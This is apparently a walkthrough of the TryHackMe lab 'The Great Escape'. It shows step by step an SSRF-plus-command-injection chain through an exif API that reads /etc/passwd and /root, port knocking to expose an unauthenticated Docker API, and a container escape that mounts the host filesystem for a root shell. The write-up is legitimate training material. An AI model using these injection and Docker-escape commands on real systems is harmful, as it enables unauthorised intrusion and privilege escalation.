TryHackMe: The Great Escape writeup/walkthrough
Writeup/tutorial for the room ‘The Great Escape’ on TryHackMe
Room Link | Medium difficulty
As per THM rules, write-ups shouldn’t include passwords/cracked hashes/flags. I can only help you find out how to get the answer, not give you the answer.
Deploy the machine and in the meantime, connect to the THM network:
sudo openvpn --config <your_vpn_file>This room focuses on exploiting Docker and there are 3 flags to get. I got all the flags in different order but no need to worry though since you don’t need the first flag to move on and get the other flags. One last thing, I would recommend doing the Docker Rodeo room on THM first as it has an intro to docker and a few vulnerabilities to exploit it. It was helpful for me in understanding docker so I would recommend doing that room first if you don’t know about docker or how to exploit docker. Now let’s get started!
After doing a port scan with Threader3000, it reveals 2 open ports, 22 and 80 which I’m guessing is an ssh port and a web server as they are default port for those services.
Going to port 80 shows us a website, PHOTO Classroom.
The hint for the first flag mentions a well known file may offer some help so I decide to check the robots.txt file which reveals 2 directories and a file.
Going to /exif-util shows us a page which accepts images and returns the exif data for it. I tried a few injections but they didn’t work as they would normally require an upload directory and when I intercepted the request in burp suite, it wasn’t uploading the file to the web server but instead it was sending the image data. This was a dead end.
I tried bruteforcing the directory for *.bak.txt but there seems to be some rate limiting which always results in a 503 error. If you try to go to exif-util.bak.txt, this will reveal an address that we can use.
http://<Machine_IP>/exif-util.bak.txt
If we go to /api directory, we can see the following message.
However if we add exif to it, it will show a completely different error, one that I didn’t see before. All the errors that I saw earlier were default 403 and 503 errors but this is different.
Since exif tool can accept a URL as we tried earlier, we can use a default parameter, url, to send a GET request to the url we found earlier. This works
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080
We can also try to add the exif with url parameter to the end again and try to see if we can get something.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=
It gives us a curl error meaning we can probably get Remote Code Execution. We can try adding a semi colon to get out of the curl command and then try reading /etc/passwd.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;cat /etc/passwd
Unfortunately for us, we can’t read this file since it contains a banned word (probably some filter of sorts). If we see what is in the home directory for current user, you’ll see a dev-note.txt file.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;ls ~
Let’s try reading this file.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;cat ~/dev-note.txt
This gives us a password and a username that we can try. When I tried these credentials on the login page and ssh, they didnt work. SSH didn’t return any output so that’s another dead end. If you do an aggressive nmap scan on port 22, you’ll see that it marks ssh with a question mark meaning it’s not sure if it actually is ssh. Let’s check the root directory for anything else that could be useful.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;ls -la /root
This reveals a .git directory meaning git is probably configured here. If you read the dev-note.txt, the writer said that they removed the flag from the directory. With git, we can check logs see the changes that were made and see if there is a flag there. We can use -C option for git to give the path for .git directory and type log to check the logs.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;git -C /root log
As you can see, Hydra made a few commit, adding a flag, removing the flag and fixing the dev note. We can to see the commit made for when Hydra added the flag so copy commit hash as marked in the image above and use it to view the addition of flag.
http://<Machine_IP>/api/exif?url=http://api-dev-backup:8080/exif?url=;git -C /root show a3d30a7d0510dc6565ff9316e3fb84434916dee8
And we have a flag! There is also another part to this where hydra says to access docker, we can knock on the given ports and then we can access docker. I tried knocking on the given ports manually but I probably did it wrong. I cloned a git repository which does port knocking and then checked to see if the default docker port 2375 was open.
cd /opt
sudo git clone https://github.com/grongor/knock.git
cd knock
./knock <Machine_IP> 42 1337 10420 6969 63000
nmap <Machine_IP> -p 2375
Lo and behold, the docker port was now open! The next 2 steps I give might be unnecessary but I did it anyways where I added the machine IP with the docker port to tell docker to trust this instance and then restarted it.
sudo nano /etc/docker/daemon.json
I restarted my docker service by stopping it and then starting it again after waiting for at least 30 seconds.
sudo systemctl stop docker
<Wait 30 seconds>
sudo systemctl start docker
Now that that is over, we can look for the rest of the flags. Checking the images, we can see that there is alpine 3.9 repository which we can exploit and escape out of docker instance.
We are essentially mounting the hosts “/” directory to the “/mnt” dir in a new container, chrooting and then connecting via a shell (Reference — Task 9).
docker -H <Machine_IP>:2375 imagesdocker -H <Machine_IP>:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt shcat /etc/passwd
As you can see, there is a user named hydra which is the same name we saw earlier who did the git commits. I exited out of the container and tried to get a bash shell instead of sh shell. I then moved to root directory and found the 3rd flag over there.
exitdocker -H <Machine_IP>:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt bashcd /root
ls
cat flag.txt
There was 1 flag left. I exited out of the shell and then looked at the available containers and found a frontend container which given the fact that we are looking for a web app flag, we can assume that it will be found there. If you notice the last container, it is endlessh which is what was causing the ssh connection to not work since it wasn’t a real ssh service.
docker -H <Machine_IP>:2375 ps
I got a shell for the frontend container and found the directory for nginx. I believe some of the errors on the website leaked that the website was running on nginx and because of this, we can find out where the nginx directory is by looking through the config files.
docker -H tcp://10.10.90.88:2375 exec -it dockerescapecompose_frontend_1 bashcd /etc/nginx/conf.d/
cat default.conf
When we go to the nginx directory, we can see that there is a hidden directory called .well-known which is what the flag 1 hint was referring to. In this directory there is a file called security.txt which has the hint for getting the web app flag.
cd /usr/share/nginx/html
ls -la | head
cd .well-known/
ls
cat security.txt
We can use curl with the --head option to send a HEAD request.
curl --head http://<Machine_IP>/api/fl46
I hope this helps you all and if it doesn’t, please leave a comment and I’ll try to help out. Getting the initial foothold was a difficult tasks and I followed John Hammond’s tutorial as it was very helpful. I definitely learned a few things and hope you do too. Follow me for more write-ups!